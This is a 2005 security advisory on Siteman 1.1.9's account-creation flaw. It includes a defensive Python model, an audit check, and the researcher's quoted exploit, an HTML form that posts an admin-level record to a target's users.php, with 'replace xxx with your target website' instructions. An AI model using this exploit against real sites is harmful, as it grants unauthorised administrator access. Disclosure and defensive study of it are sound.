


Category:   Application (Forum/Board/Portal)  >   Siteman Vendors:
Siteman Lets Remote Users Create Administrative Accounts
SecurityTracker Alert ID:  1012951
SecurityTracker URL:
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Jan 20 2005
Impact:   User access via network
Exploit Included:  Yes  
Version(s): 1.1.9
Description:   amironline452 of the Alpha Hackers Digital Security Team reported an authentication vulnerability in Siteman. A remote user can gain administrative access.

The account-creation flow in 'users.php' first shows a confirmation page and then posts the complete user record back to the server as a hidden 'line' parameter of the 'do=docreate' action, which appends it to the flat-file user database without re-validating it. Because the record carries the member level among its '|'-separated fields, a remote user can send a crafted HTTP POST request directly to 'users.php?do=docreate' with a 'line' value whose level field is '5' (i.e., administrator privileges) and obtain an administrative account without authenticating.

A demonstration exploit value [that creates an account with a username of 'amir452' and password of 'amir452'] is given in the source message below; its third '|'-separated field, the member level, is set to '5'.
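The flaw described above is a client-trusted record write: the server accepts a fully serialised user record from the browser and stores it. The Python model below is an added example, not code from Siteman or from the advisory. It reproduces that behaviour against an in-memory stand-in for the flat-file user database, contrasts it with a handler that rebuilds the record server-side and never takes a level from the client, and adds an audit helper that flags admin-level accounts the operator did not create. The record's field order, the default member level of 1, the two unidentified fields, and the salted PBKDF2 hashing in the hardened path are assumptions; only the username, level 5 (Admin), display name and signature positions are confirmed by the exploit's confirmation page.

```python
import hashlib
import os
import time

# Field order inferred from the demonstration record in the advisory
# (assumption: only username, level, display name and signature are
# positively identified by the exploit's confirmation page).
FIELDS = ["username", "pwhash", "level", "email", "display", "created",
          "question", "anshash", "hide_email", "f9", "f10", "signature"]
ADMIN_LEVEL = 5       # "5 (Admin)" in the advisory
DEFAULT_LEVEL = 1     # assumed level for self-registered members
SEP = "|"

# The advisory's demonstration record, minus its leading space (constructed copy).
EXPLOIT_LINE = ("amir452|347a9a8a8d3f364f0bdb82c4208a3207|5||amir452|1105956827|"
                "amir452|347a9a8a8d3f364f0bdb82c4208a3207|0|0|0|hackers")


def parse_record(line):
    """Split one flat-file record into a dict keyed by FIELDS."""
    parts = line.rstrip("\n").split(SEP)
    if len(parts) != len(FIELDS):
        raise ValueError(f"expected {len(FIELDS)} fields, got {len(parts)}")
    return dict(zip(FIELDS, parts))


def hash_secret(secret, salt=None):
    """Salted PBKDF2 (our choice, not Siteman's); '$' never collides with SEP."""
    salt = salt or os.urandom(8)
    digest = hashlib.pbkdf2_hmac("sha256", secret.encode(), salt, 100_000)
    return salt.hex() + "$" + digest.hex()


class UserStore:
    """In-memory stand-in for Siteman's flat-file user database."""

    def __init__(self):
        self.lines = []

    def vulnerable_docreate(self, form):
        # Mirrors the flaw: the confirmation page echoes the whole record
        # back in a hidden 'line' field and this step appends it verbatim,
        # so the client decides every field, including the level.
        self.lines.append(form["line"])
        return parse_record(form["line"])

    def hardened_docreate(self, form):
        # Never accept a pre-serialised record or a privilege level from
        # the client; rebuild the record from individual fields instead.
        if "line" in form or "level" in form:
            raise ValueError("client may not supply a raw record or a level")
        fields = {k: form.get(k, "") for k in
                  ("username", "password", "display", "email",
                   "question", "answer", "signature")}
        for key, value in fields.items():
            if SEP in value or "\n" in value:
                raise ValueError(f"illegal character in {key}")
        if not fields["username"] or not fields["password"]:
            raise ValueError("username and password are required")
        if any(parse_record(l)["username"] == fields["username"] for l in self.lines):
            raise ValueError("username already taken")
        record = {
            "username": fields["username"],
            "pwhash": hash_secret(fields["password"]),
            "level": str(DEFAULT_LEVEL),          # the server decides, always
            "email": fields["email"],
            "display": fields["display"] or fields["username"],
            "created": str(int(time.time())),
            "question": fields["question"],
            "anshash": hash_secret(fields["answer"]),
            "hide_email": "1" if form.get("hide_email") == "yes" else "0",
            "f9": "0", "f10": "0",                # unidentified fields, assumed defaults
            "signature": fields["signature"],
        }
        self.lines.append(SEP.join(record[f] for f in FIELDS))
        return record


def unexpected_admins(lines, known_admins):
    """Audit check: admin-level usernames not in the operator's expected set."""
    found = []
    for line in lines:
        rec = parse_record(line)
        if int(rec["level"]) >= ADMIN_LEVEL and rec["username"] not in known_admins:
            found.append(rec["username"])
    return found


if __name__ == "__main__":
    store = UserStore()
    print(store.vulnerable_docreate({"line": EXPLOIT_LINE})["level"])   # 5
    print(unexpected_admins(store.lines, {"admin"}))                     # ['amir452']
```

Since the advisory lists no fix, `unexpected_admins` run over the real user file is the practical check for an exposed site: any level-5 account the operator did not create is a sign the docreate action was abused.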


Impact:   A remote user can create an administrative account.
Solution:   No solution was available at the time of this entry.
Vendor URL:
Cause:   Authentication error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.

 Source Message Contents

Subject:  I Found a Vulnerability in ...

New CSS vulnerability in Siteman v1.1.9

Discovered By amironline452 (
By Alpha Hackers Digital Security Team

About Siteman CMS:

Siteman is a CMS that works without a MySQL database and is written in PHP.
Someone who is not familiar with professional website management can fully
manage a website with this CMS.
For further information contact these addresses:


HTML Code for CSS:

<html>
<body>
<b>These data were recorded.</b><br /><br />
<table cellspacing="0" cellpadding="2">
<tr><td>Username (Use this, and not your display name, when logging in)</td><td align="right">amir452</td></tr>
<tr><td>Password</td><td align="right"><form><select><option>Click to show password</option></select></form></td></tr>
<tr><td>Secret Question (Asked when you forget your password)</td><td align="right">amir452</td></tr>
<tr><td>Answer to secret question</td><td align="right"><form><select><option>Click to show answer</option></select></form></td></tr>
<tr><td>Display name</td><td align="right">amir452</td></tr>
<tr><td>Member Level</td><td align="right"><b>5</b> (Admin)</td></tr>
<tr><td>email</td><td align="right"></td></tr>
<tr><td>Hide my email address</td><td align="right">no</td></tr>
<tr><td>Forum Signature</td><td align="right">hackers</td></tr>
</table><br /><br />Is this correct?<br />
<table cellspacing="0" cellpadding="3">
<tr><td>
<form action="users.php?do=new" method="post"><input type="submit" value="no" /></form>
</td><td>
<!-- The "yes" form is the exploit proper: it posts the complete user record,
     level 5 (Admin) included, straight to the docreate action. -->
<form action="http://xxx/users.php?do=docreate" method="post">
<input type="hidden" name="line" value=" amir452|347a9a8a8d3f364f0bdb82c4208a3207|5||amir452|1105956827|amir452|347a9a8a8d3f364f0bdb82c4208a3207|0|0|0|hackers" />
<input type="submit" value="yes" />
</form>
</td></tr>
</table>
</body>
</html>


Replace xxx with your target website, then save this code with the .html extension.
Then click the yes button to create an account on the website with the admin (5) class.
The username of this account is: amir452
and the password for this account is: amir452

With special thanks to shoaliesefid7 ( the admin of the
Alpha Hackers Digital Security Team ( and the other
members of this Team.

Have Fun 





